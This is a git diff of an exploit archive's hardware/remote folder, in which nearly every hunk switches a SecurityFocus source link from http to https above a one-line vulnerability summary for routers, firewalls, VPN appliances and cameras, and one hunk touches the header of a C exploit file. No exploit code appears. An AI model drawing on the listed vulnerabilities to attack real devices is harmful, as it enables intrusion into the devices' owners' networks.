+++ b/exploits/hardware/remote/33045.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35425/info +source: https://www.securityfocus.com/bid/35425/info Apple iPhone is prone to a security-bypass vulnerability that may cause a call to be placed automatically. diff --git a/exploits/hardware/remote/33046.html b/exploits/hardware/remote/33046.html index 2b72578f0..78c27fb2d 100644 --- a/exploits/hardware/remote/33046.html +++ b/exploits/hardware/remote/33046.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35425/info +source: https://www.securityfocus.com/bid/35425/info Apple iPhone is prone to a security-bypass vulnerability that may cause a call to be placed automatically. diff --git a/exploits/hardware/remote/33054.txt b/exploits/hardware/remote/33054.txt index 5f8130dd0..259ffe850 100644 --- a/exploits/hardware/remote/33054.txt +++ b/exploits/hardware/remote/33054.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35475/info +source: https://www.securityfocus.com/bid/35475/info Cisco Adaptive Security Appliance (ASA) is prone to a vulnerability that can aid in phishing attacks. diff --git a/exploits/hardware/remote/33055.html b/exploits/hardware/remote/33055.html index 2df405b84..51cb943ec 100644 --- a/exploits/hardware/remote/33055.html +++ b/exploits/hardware/remote/33055.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35476/info +source: https://www.securityfocus.com/bid/35476/info Cisco ASA (Adaptive Security Appliance) is prone to a cross-site scripting vulnerability because its Web VPN fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/33165.txt b/exploits/hardware/remote/33165.txt index 4d5a063e3..ad64c3eca 100644 --- a/exploits/hardware/remote/33165.txt +++ b/exploits/hardware/remote/33165.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36031/info +source: https://www.securityfocus.com/bid/36031/info Multiple 2Wire routers are prone to an access-validation vulnerability because they fail to adequately authenticate users before performing certain actions. diff --git a/exploits/hardware/remote/33177.txt b/exploits/hardware/remote/33177.txt index 874c1ac05..75aaa3429 100644 --- a/exploits/hardware/remote/33177.txt +++ b/exploits/hardware/remote/33177.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36076/info +source: https://www.securityfocus.com/bid/36076/info The NetGear WNR2000 is prone to multiple remote information-disclosure issues because it fails to restrict access to sensitive information. diff --git a/exploits/hardware/remote/33234.txt b/exploits/hardware/remote/33234.txt index bb8a86186..41422f709 100644 --- a/exploits/hardware/remote/33234.txt +++ b/exploits/hardware/remote/33234.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36466/info +source: https://www.securityfocus.com/bid/36466/info Check Point Connectra is prone to an arbitrary-script-injection vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/33257.txt b/exploits/hardware/remote/33257.txt index eb92d3fc4..70f20f970 100644 --- a/exploits/hardware/remote/33257.txt +++ b/exploits/hardware/remote/33257.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36537/info +source: https://www.securityfocus.com/bid/36537/info Juniper Networks JUNOS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data to J-Web (Juniper Web Management). diff --git a/exploits/hardware/remote/33258.txt b/exploits/hardware/remote/33258.txt index ef7e2419e..624dabefc 100644 --- a/exploits/hardware/remote/33258.txt +++ b/exploits/hardware/remote/33258.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36537/info +source: https://www.securityfocus.com/bid/36537/info Juniper Networks JUNOS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data to J-Web (Juniper Web Management). diff --git a/exploits/hardware/remote/33259.txt b/exploits/hardware/remote/33259.txt index 085510098..6cd99e959 100644 --- a/exploits/hardware/remote/33259.txt +++ b/exploits/hardware/remote/33259.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36537/info +source: https://www.securityfocus.com/bid/36537/info Juniper Networks JUNOS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data to J-Web (Juniper Web Management). diff --git a/exploits/hardware/remote/33260.txt b/exploits/hardware/remote/33260.txt index cf6e7295e..a69dd0777 100644 --- a/exploits/hardware/remote/33260.txt +++ b/exploits/hardware/remote/33260.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36537/info +source: https://www.securityfocus.com/bid/36537/info Juniper Networks JUNOS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data to J-Web (Juniper Web Management). diff --git a/exploits/hardware/remote/33261.txt b/exploits/hardware/remote/33261.txt index 762843384..07628ffb4 100644 --- a/exploits/hardware/remote/33261.txt +++ b/exploits/hardware/remote/33261.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36537/info +source: https://www.securityfocus.com/bid/36537/info Juniper Networks JUNOS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data to J-Web (Juniper Web Management). diff --git a/exploits/hardware/remote/33265.js b/exploits/hardware/remote/33265.js index fc4d71501..de79a69e4 100644 
--- a/exploits/hardware/remote/33265.js +++ b/exploits/hardware/remote/33265.js @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36592/info +source: https://www.securityfocus.com/bid/36592/info Palm WebOS is prone to an arbitrary-script-injection vulnerability because the integrated email application fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/33423.txt b/exploits/hardware/remote/33423.txt index ea8bb96c3..4d3097a27 100644 --- a/exploits/hardware/remote/33423.txt +++ b/exploits/hardware/remote/33423.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37432/info +source: https://www.securityfocus.com/bid/37432/info The Barracuda Web Application Firewall 660 is prone to multiple HTML-injection vulnerabilities. diff --git a/exploits/hardware/remote/33471.txt b/exploits/hardware/remote/33471.txt index f27e220d3..3816592b7 100644 --- a/exploits/hardware/remote/33471.txt +++ b/exploits/hardware/remote/33471.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37646/info +source: https://www.securityfocus.com/bid/37646/info D-LINK DKVM-IP8 is prone to a cross-site scripting vulnerability because the device's web interface fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/33567.txt b/exploits/hardware/remote/33567.txt index 38253dae2..a25bd09df 100644 --- a/exploits/hardware/remote/33567.txt +++ b/exploits/hardware/remote/33567.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37960/info +source: https://www.securityfocus.com/bid/37960/info Cisco Secure Desktop is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/33568.txt b/exploits/hardware/remote/33568.txt index d5e95323c..823005c81 100644 --- a/exploits/hardware/remote/33568.txt +++ b/exploits/hardware/remote/33568.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37962/info +source: https://www.securityfocus.com/bid/37962/info MiFi 2352 is prone to an information-disclosure vulnerability that may expose sensitive information. diff --git a/exploits/hardware/remote/33580.txt b/exploits/hardware/remote/33580.txt index 4baf396bf..1ca9cdf8b 100644 --- a/exploits/hardware/remote/33580.txt +++ b/exploits/hardware/remote/33580.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38004/info +source: https://www.securityfocus.com/bid/38004/info Comtrend CT-507 IT is prone to a cross-site scripting vulnerability because the device's web interface fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/33648.txt b/exploits/hardware/remote/33648.txt index b9213b280..8f410421c 100644 --- a/exploits/hardware/remote/33648.txt +++ b/exploits/hardware/remote/33648.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38261/info +source: https://www.securityfocus.com/bid/38261/info Huawei HG510 is prone to multiple cross-site request-forgery vulnerabilities. diff --git a/exploits/hardware/remote/33869.txt b/exploits/hardware/remote/33869.txt index c8e84b4e6..b27af74f3 100644 --- a/exploits/hardware/remote/33869.txt +++ b/exploits/hardware/remote/33869.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39646/info +source: https://www.securityfocus.com/bid/39646/info The Huawei EchoLife HG520 is prone to an information-disclosure vulnerability. diff --git a/exploits/hardware/remote/33938.txt b/exploits/hardware/remote/33938.txt index 6a51dcd56..66decf07f 100644 --- a/exploits/hardware/remote/33938.txt +++ b/exploits/hardware/remote/33938.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39928/info +source: https://www.securityfocus.com/bid/39928/info The Sterlite SAM300 AX Router is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. 
diff --git a/exploits/hardware/remote/33962.txt b/exploits/hardware/remote/33962.txt index 58cacba84..d03f6066e 100644 --- a/exploits/hardware/remote/33962.txt +++ b/exploits/hardware/remote/33962.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40002/info +source: https://www.securityfocus.com/bid/40002/info Cisco Application Control Engine (ACE) is prone to a security weakness that may allow attackers to obfuscate HTTP server log entries. diff --git a/exploits/hardware/remote/34018.txt b/exploits/hardware/remote/34018.txt index 3d565bb84..87493d101 100644 --- a/exploits/hardware/remote/34018.txt +++ b/exploits/hardware/remote/34018.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40292/info +source: https://www.securityfocus.com/bid/40292/info U.S.Robotics USR5463 firmware is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/hardware/remote/34033.html b/exploits/hardware/remote/34033.html index 24ebfeb4a..8ba2a1aed 100644 --- a/exploits/hardware/remote/34033.html +++ b/exploits/hardware/remote/34033.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40346/info +source: https://www.securityfocus.com/bid/40346/info Cisco DPC2100 (formerly Scientific Atlanta DPC2100) is prone to multiple security-bypass and cross-site request-forgery vulnerabilities. diff --git a/exploits/hardware/remote/34182.txt b/exploits/hardware/remote/34182.txt index 97e95a2d7..0350ccbb9 100644 --- a/exploits/hardware/remote/34182.txt +++ b/exploits/hardware/remote/34182.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41061/info +source: https://www.securityfocus.com/bid/41061/info Linksys WAP54Gv3 Wireless Router is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/34184.txt b/exploits/hardware/remote/34184.txt index b14b41d65..4da8f5d59 100644 
--- a/exploits/hardware/remote/34184.txt +++ b/exploits/hardware/remote/34184.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41072/info +source: https://www.securityfocus.com/bid/41072/info Trend Micro InterScan Web Security Virtual Appliance is prone to multiple vulnerabilities. diff --git a/exploits/hardware/remote/34200.txt b/exploits/hardware/remote/34200.txt index 8e778dc47..ca5ea208f 100644 --- a/exploits/hardware/remote/34200.txt +++ b/exploits/hardware/remote/34200.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41159/info +source: https://www.securityfocus.com/bid/41159/info Cisco Adaptive Security Response (ASA) is prone to an HTTP response-splitting vulnerability. diff --git a/exploits/hardware/remote/34208.txt b/exploits/hardware/remote/34208.txt index c2556ca70..3af59c492 100644 --- a/exploits/hardware/remote/34208.txt +++ b/exploits/hardware/remote/34208.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41187/info +source: https://www.securityfocus.com/bid/41187/info The D-Link DAP-1160 wireless access point (WAP) is prone to a security-bypass vulnerability. diff --git a/exploits/hardware/remote/34316.txt b/exploits/hardware/remote/34316.txt index 14b37cbd7..b976d5f1d 100644 --- a/exploits/hardware/remote/34316.txt +++ b/exploits/hardware/remote/34316.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41664/info +source: https://www.securityfocus.com/bid/41664/info Juniper Networks SA2000 SSL VPN appliance is prone to a cross-site scripting vulnerability because the web interface fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/34802.html b/exploits/hardware/remote/34802.html index bbf18d63e..956ab93d8 100644 --- a/exploits/hardware/remote/34802.html +++ b/exploits/hardware/remote/34802.html 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/43685/info +source: https://www.securityfocus.com/bid/43685/info Research In Motion BlackBerry Device Software is prone to a cross-domain information-disclosure vulnerability because the application's web browser fails to properly enforce the same-origin policy. diff --git a/exploits/hardware/remote/34986.txt b/exploits/hardware/remote/34986.txt index fc7e49d42..5e50bef6c 100644 --- a/exploits/hardware/remote/34986.txt +++ b/exploits/hardware/remote/34986.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44743/info +source: https://www.securityfocus.com/bid/44743/info The D-Link DIR-300 wireless router is prone to multiple security-bypass vulnerabilities. diff --git a/exploits/hardware/remote/35014.txt b/exploits/hardware/remote/35014.txt index c7c2af778..733a8662b 100644 --- a/exploits/hardware/remote/35014.txt +++ b/exploits/hardware/remote/35014.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45038/info +source: https://www.securityfocus.com/bid/45038/info The D-Link DIR-300 wireless router is prone to a security-bypass vulnerability. diff --git a/exploits/hardware/remote/35068.txt b/exploits/hardware/remote/35068.txt index f5be93095..823a67f58 100644 --- a/exploits/hardware/remote/35068.txt +++ b/exploits/hardware/remote/35068.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45272/info +source: https://www.securityfocus.com/bid/45272/info pfSense is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/35069.txt b/exploits/hardware/remote/35069.txt index 0b7252ded..3774d0340 100644 --- a/exploits/hardware/remote/35069.txt +++ b/exploits/hardware/remote/35069.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45272/info +source: https://www.securityfocus.com/bid/45272/info pfSense is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/35070.txt b/exploits/hardware/remote/35070.txt index ad37fa970..863716ec6 100644 --- a/exploits/hardware/remote/35070.txt +++ b/exploits/hardware/remote/35070.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45272/info +source: https://www.securityfocus.com/bid/45272/info pfSense is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/35071.txt b/exploits/hardware/remote/35071.txt index c59e1bc4b..f44ef29a8 100644 --- a/exploits/hardware/remote/35071.txt +++ b/exploits/hardware/remote/35071.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45272/info +source: https://www.securityfocus.com/bid/45272/info pfSense is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/35170.txt b/exploits/hardware/remote/35170.txt index 9b1203e2b..4dec60cd4 100644 --- a/exploits/hardware/remote/35170.txt +++ b/exploits/hardware/remote/35170.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45688/info +source: https://www.securityfocus.com/bid/45688/info Lexmark Printer X651de is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/hardware/remote/35317.txt b/exploits/hardware/remote/35317.txt index bfda3564f..143d3c679 100644 --- a/exploits/hardware/remote/35317.txt +++ b/exploits/hardware/remote/35317.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46224/info +source: https://www.securityfocus.com/bid/46224/info Multiple Check Point endpoint security products are prone to multiple information-disclosure vulnerabilities. diff --git a/exploits/hardware/remote/35597.txt b/exploits/hardware/remote/35597.txt index 77b8147cd..6910d65cb 100644 --- a/exploits/hardware/remote/35597.txt +++ b/exploits/hardware/remote/35597.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47277/info +source: https://www.securityfocus.com/bid/47277/info Fiberhome HG-110 is prone to a cross-site scripting vulnerability and a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/hardware/remote/35620.txt b/exploits/hardware/remote/35620.txt index 10420b8ff..12512f9e2 100644 --- a/exploits/hardware/remote/35620.txt +++ b/exploits/hardware/remote/35620.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47390/info +source: https://www.securityfocus.com/bid/47390/info Technicolor THOMSON TG585v7 Wireless Router is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/35762.txt b/exploits/hardware/remote/35762.txt index 787d6c41a..1b28ffd1f 100644 --- a/exploits/hardware/remote/35762.txt +++ b/exploits/hardware/remote/35762.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47901/info +source: https://www.securityfocus.com/bid/47901/info Cisco Unified Operations Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/35763.txt b/exploits/hardware/remote/35763.txt index f03a69655..682738626 100644 --- a/exploits/hardware/remote/35763.txt +++ b/exploits/hardware/remote/35763.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47901/info +source: https://www.securityfocus.com/bid/47901/info Cisco Unified Operations Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/35764.txt b/exploits/hardware/remote/35764.txt index 4dbc8d101..3db13a22e 100644 --- a/exploits/hardware/remote/35764.txt +++ b/exploits/hardware/remote/35764.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47901/info +source: https://www.securityfocus.com/bid/47901/info Cisco Unified Operations Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/35765.txt b/exploits/hardware/remote/35765.txt index 591c554c9..5bf835e0f 100644 --- a/exploits/hardware/remote/35765.txt +++ b/exploits/hardware/remote/35765.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47901/info +source: https://www.securityfocus.com/bid/47901/info Cisco Unified Operations Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/35766.txt b/exploits/hardware/remote/35766.txt index 6b41c9bdd..769ffd832 100644 --- a/exploits/hardware/remote/35766.txt +++ b/exploits/hardware/remote/35766.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47901/info +source: https://www.securityfocus.com/bid/47901/info Cisco Unified Operations Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/35779.txt b/exploits/hardware/remote/35779.txt index 9cb8c0308..8880ab171 100644 --- a/exploits/hardware/remote/35779.txt +++ b/exploits/hardware/remote/35779.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47902/info +source: https://www.securityfocus.com/bid/47902/info CiscoWorks Common Services is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/hardware/remote/35780.txt b/exploits/hardware/remote/35780.txt index 6233f05cc..27f710e6d 100644 --- a/exploits/hardware/remote/35780.txt +++ b/exploits/hardware/remote/35780.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47903/info +source: https://www.securityfocus.com/bid/47903/info Cisco Unified Operations Manager is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/hardware/remote/35800.txt b/exploits/hardware/remote/35800.txt index 14b536562..f1458e4a0 100644 --- a/exploits/hardware/remote/35800.txt +++ b/exploits/hardware/remote/35800.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47976/info +source: https://www.securityfocus.com/bid/47976/info The RXS-3211 IP camera is prone to an information-disclosure vulnerability. diff --git a/exploits/hardware/remote/35817.txt b/exploits/hardware/remote/35817.txt index 14a541fa8..8380e0e80 100644 --- a/exploits/hardware/remote/35817.txt +++ b/exploits/hardware/remote/35817.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48085/info +source: https://www.securityfocus.com/bid/48085/info NetGear WNDAP350 wireless access point is prone to multiple remote information-disclosure issues because it fails to restrict access to sensitive information. diff --git a/exploits/hardware/remote/35925.txt b/exploits/hardware/remote/35925.txt index 7094039ef..6098015a4 100644 --- a/exploits/hardware/remote/35925.txt +++ b/exploits/hardware/remote/35925.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48560/info +source: https://www.securityfocus.com/bid/48560/info The Portech MV-372 VoIP Gateway is prone to multiple security vulnerabilities. diff --git a/exploits/hardware/remote/35932.c b/exploits/hardware/remote/35932.c index 867575bd2..e9284c41e 100644 --- a/exploits/hardware/remote/35932.c +++ b/exploits/hardware/remote/35932.c @@ -1,4 +1,4 @@ - /* +/* ** File : satcompwn.c - [VSAT SAILOR SAT COM 900 Remote 0day] ** Author : Nicholas Lemonias ** diff --git a/exploits/hardware/remote/35970.txt b/exploits/hardware/remote/35970.txt index c51bb4f4d..0d0545a01 100644 --- a/exploits/hardware/remote/35970.txt +++ b/exploits/hardware/remote/35970.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48711/info +source: https://www.securityfocus.com/bid/48711/info The Iskratel SI2000 Callisto 821+ is prone to a cross-site request-forgery vulnerability and multiple HTML-injection vulnerabilities. diff --git a/exploits/hardware/remote/35997.sh b/exploits/hardware/remote/35997.sh index 67882a5d2..0eadf0075 100755 --- a/exploits/hardware/remote/35997.sh +++ b/exploits/hardware/remote/35997.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48908/info +source: https://www.securityfocus.com/bid/48908/info Sagem F@st 3304 router is prone to a remote information-disclosure vulnerability because it fails to restrict access to sensitive information. diff --git a/exploits/hardware/remote/36205.txt b/exploits/hardware/remote/36205.txt index d0d0b719d..8592a4742 100644 --- a/exploits/hardware/remote/36205.txt +++ b/exploits/hardware/remote/36205.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49930/info +source: https://www.securityfocus.com/bid/49930/info SonicWall NSA 4500 is prone to an HTML-injection vulnerability and a session-hijacking vulnerability. diff --git a/exploits/hardware/remote/36239.txt b/exploits/hardware/remote/36239.txt index a2c6bdcdf..0e29177e9 100644 
--- a/exploits/hardware/remote/36239.txt +++ b/exploits/hardware/remote/36239.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50189/info +source: https://www.securityfocus.com/bid/50189/info Check Point UTM-1 Edge and Safe are prone to multiple security vulnerabilities, including: diff --git a/exploits/hardware/remote/36256.txt b/exploits/hardware/remote/36256.txt index b5e90baa0..592136216 100644 --- a/exploits/hardware/remote/36256.txt +++ b/exploits/hardware/remote/36256.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50372/info +source: https://www.securityfocus.com/bid/50372/info Multiple Cisco products are prone to a directory-traversal vulnerability. diff --git a/exploits/hardware/remote/36428.txt b/exploits/hardware/remote/36428.txt index fe0cdf72a..a4cc0ee58 100644 --- a/exploits/hardware/remote/36428.txt +++ b/exploits/hardware/remote/36428.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50968/info +source: https://www.securityfocus.com/bid/50968/info Axis M10 Series Network Cameras are prone to a cross-site scripting vulnerability because they fail to sufficiently sanitize user-supplied data. diff --git a/exploits/hardware/remote/36429.txt b/exploits/hardware/remote/36429.txt index 45dd4dd28..1c14fdfc3 100644 --- a/exploits/hardware/remote/36429.txt +++ b/exploits/hardware/remote/36429.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50978/info +source: https://www.securityfocus.com/bid/50978/info HS2 web interface is prone to multiple security vulnerabilities: diff --git a/exploits/hardware/remote/36475.txt b/exploits/hardware/remote/36475.txt index 34c229a38..17cc26145 100644 --- a/exploits/hardware/remote/36475.txt +++ b/exploits/hardware/remote/36475.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51156/info +source: https://www.securityfocus.com/bid/51156/info Barracuda Control Center 620 is prone to an HTML injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/36511.txt b/exploits/hardware/remote/36511.txt index 2115b80be..2fc3c69f2 100644 --- a/exploits/hardware/remote/36511.txt +++ b/exploits/hardware/remote/36511.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51301/info +source: https://www.securityfocus.com/bid/51301/info Astaro Security Gateway is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/hardware/remote/36670.txt b/exploits/hardware/remote/36670.txt index 618640c86..287bb2acb 100644 --- a/exploits/hardware/remote/36670.txt +++ b/exploits/hardware/remote/36670.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51918/info +source: https://www.securityfocus.com/bid/51918/info D-Link ShareCenter products are prone to multiple remote code-execution vulnerabilities. diff --git a/exploits/hardware/remote/36680.txt b/exploits/hardware/remote/36680.txt index 223fb6563..6bd51af57 100644 --- a/exploits/hardware/remote/36680.txt +++ b/exploits/hardware/remote/36680.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51922/info +source: https://www.securityfocus.com/bid/51922/info Multiple Trendnet Camera products are prone to a remote security-bypass vulnerability. diff --git a/exploits/hardware/remote/36767.html b/exploits/hardware/remote/36767.html index f57ddb481..ec3a71211 100644 --- a/exploits/hardware/remote/36767.html +++ b/exploits/hardware/remote/36767.html 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51985/info +source: https://www.securityfocus.com/bid/51985/info D-Link DAP-1150 is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/36831.txt b/exploits/hardware/remote/36831.txt index 25d5550f2..92cc85530 100644 --- a/exploits/hardware/remote/36831.txt +++ b/exploits/hardware/remote/36831.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52076/info +source: https://www.securityfocus.com/bid/52076/info Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/hardware/remote/36832.txt b/exploits/hardware/remote/36832.txt index 5442708fe..dae2f6478 100644 --- a/exploits/hardware/remote/36832.txt +++ b/exploits/hardware/remote/36832.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52076/info +source: https://www.securityfocus.com/bid/52076/info Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/hardware/remote/36833.txt b/exploits/hardware/remote/36833.txt index dc6baf7f0..67ecce5e6 100644 --- a/exploits/hardware/remote/36833.txt +++ b/exploits/hardware/remote/36833.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52076/info +source: https://www.securityfocus.com/bid/52076/info Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/hardware/remote/36864.txt b/exploits/hardware/remote/36864.txt index 37acf42d9..de397ca3f 100644 --- a/exploits/hardware/remote/36864.txt +++ b/exploits/hardware/remote/36864.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52098/info +source: https://www.securityfocus.com/bid/52098/info Xavi 7968 ADSL Router is prone to cross-site scripting, HTML-injection and cross-site request forgery vulnerabilities. diff --git a/exploits/hardware/remote/36866.txt b/exploits/hardware/remote/36866.txt index 0ec9ac531..3c0e78c93 100644 --- a/exploits/hardware/remote/36866.txt +++ b/exploits/hardware/remote/36866.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52098/info +source: https://www.securityfocus.com/bid/52098/info Xavi 7968 ADSL Router is prone to cross-site scripting, HTML-injection and cross-site request forgery vulnerabilities. diff --git a/exploits/hardware/remote/36877.html b/exploits/hardware/remote/36877.html index c1f16995a..4e5253587 100644 --- a/exploits/hardware/remote/36877.html +++ b/exploits/hardware/remote/36877.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52134/info +source: https://www.securityfocus.com/bid/52134/info The D-Link DCS-900, DCS-2000, and DCS-5300 are prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/36931.txt b/exploits/hardware/remote/36931.txt index 3b569787d..02e6f630f 100644 --- a/exploits/hardware/remote/36931.txt +++ b/exploits/hardware/remote/36931.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52358/info +source: https://www.securityfocus.com/bid/52358/info Barracuda CudaTel Communication Server is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/hardware/remote/36945.txt b/exploits/hardware/remote/36945.txt index 7feca0669..a0129c473 100644 --- a/exploits/hardware/remote/36945.txt +++ b/exploits/hardware/remote/36945.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52424/info +source: https://www.securityfocus.com/bid/52424/info TP-LINK TL-WR740N is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/hardware/remote/36995.txt b/exploits/hardware/remote/36995.txt index 0327c0bc0..be91d4ba0 100644 --- a/exploits/hardware/remote/36995.txt +++ b/exploits/hardware/remote/36995.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52653/info +source: https://www.securityfocus.com/bid/52653/info FirePass is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/hardware/remote/37037.txt b/exploits/hardware/remote/37037.txt index 35d412228..0b19a65e3 100644 --- a/exploits/hardware/remote/37037.txt +++ b/exploits/hardware/remote/37037.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52881/info +source: https://www.securityfocus.com/bid/52881/info Peakflow SP is prone to a cross-site scripting vulnerability because it 